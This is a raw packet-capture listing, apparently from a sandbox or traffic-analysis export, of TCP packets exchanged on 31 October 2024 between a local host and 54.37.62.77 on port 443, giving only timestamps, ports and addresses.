                                                                                                                                                                                                  Oct 31, 2024 18:05:26.025861979 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.025881052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.026056051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.026056051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.191303015 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.191317081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.191317081 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.191509962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193617105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193635941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193810940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193810940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193835020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193835020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193845034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.193905115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.194104910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197324038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197343111 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197516918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197516918 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197540045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197540045 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197550058 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197613001 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.197798967 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.199770927 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.199795008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.199974060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.199974060 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.200002909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.200002909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.200002909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.200016975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.200220108 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208440065 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208497047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208635092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208635092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208692074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208715916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208749056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.208935976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.209935904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.209991932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210160971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210161924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210161924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210161924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210230112 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210305929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.210426092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211031914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211086035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211242914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211242914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211302996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211338043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211338043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.211512089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212099075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212157965 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212347984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212348938 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212403059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212424040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.212629080 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216636896 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216691971 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216830969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216830969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216878891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.216906071 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.217001915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.217109919 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220643044 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220699072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220870972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220871925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220928907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220954895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.220993996 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.221129894 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224070072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224123955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224288940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224360943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224390030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.224596024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225249052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225302935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225472927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225472927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225529909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225584984 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225614071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.225825071 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245534897 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245589972 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245753050 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245820999 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.245853901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.246073961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.251840115 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.251894951 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252037048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252037048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252103090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.252217054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394489050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394557953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394668102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394668102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394766092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394785881 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.394953012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395610094 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395677090 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395787954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395787954 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395828009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395848036 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395879984 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.395930052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.396056890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418541908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418601990 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418721914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418721914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418762922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418762922 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418792009 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418895960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.418975115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422467947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422527075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422642946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422642946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422739029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422739029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422759056 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.422940016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424304962 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424355030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424491882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424491882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424532890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424547911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424585104 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.424709082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426266909 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426325083 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426455975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426455975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426495075 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426511049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426549911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426549911 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.426685095 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428009033 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428066969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428196907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428196907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428236961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428253889 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428289890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428388119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.428432941 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467452049 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467480898 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467623949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467623949 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467669964 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467679977 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467719078 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467763901 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.467868090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480176926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480201960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480386019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480386019 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480401039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480437994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.480566025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674707890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674724102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674770117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674818039 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674882889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674896955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674961090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674961090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674972057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.674987078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675076962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675076962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675087929 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675173998 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675185919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675221920 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675271034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675319910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675319910 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675369978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675369978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675467968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675467968 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675515890 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675565004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675612926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675662041 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675760031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675760031 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.675767899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.760674953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764615059 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764636040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764802933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764802933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764822006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764833927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764833927 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.764904976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767142057 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767163992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767405033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767422915 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.767433882 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808731079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808749914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808976889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808976889 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.808998108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.809010029 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821543932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821568012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821743011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821743011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821760893 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821774006 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821846962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.821846962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850017071 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850037098 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850238085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850238085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850256920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850267887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.850394011 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871498108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871521950 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871718884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871718884 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871738911 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871748924 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.871799946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874526024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874546051 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874726057 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874742985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874789953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.874806881 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.875843048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.875863075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876058102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876058102 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876076937 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876087904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.876138926 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880728006 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880748987 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880935907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880935907 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.880954981 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.881042004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.881042004 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890666008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890690088 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:26.890909910 CET49755443192.168.11.2054.37.62.77
